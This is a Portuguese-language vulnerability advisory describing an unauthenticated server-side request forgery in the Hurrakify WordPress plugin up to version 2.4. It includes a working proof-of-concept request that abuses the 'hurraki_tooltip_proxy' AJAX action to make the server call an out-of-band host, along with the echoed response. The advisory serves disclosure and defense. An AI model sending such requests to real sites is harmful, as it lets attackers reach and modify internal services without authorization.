
Hurrakify <= 2.4 - Falsificação de solicitação do lado do servidor sem autenticação
Hurrakify <= 2.4 - Falsificação de solicitação do lado do servidor não autenticada
O plugin Hurrakify para WordPress é vulnerável a Falsificação de Solicitação do Lado do Servidor em todas as versões até, e incluindo, a 2.4. Isso possibilita que atacantes não autenticados façam solicitações web para locais arbitrários a partir da aplicação web, o que pode ser usado para consultar e modificar informações de serviços internos.
GET /wp-admin/admin-ajax.php?action=hurraki_tooltip_proxy&target=http%3A%2F%2Fqrl9eu4dot1s941aio2eom17oyupif64.oast.site HTTP/2
Host: wp-dev.ddev.site
<html><body>bfdibc85r04ky96cie05dfzjjgigz</body></html>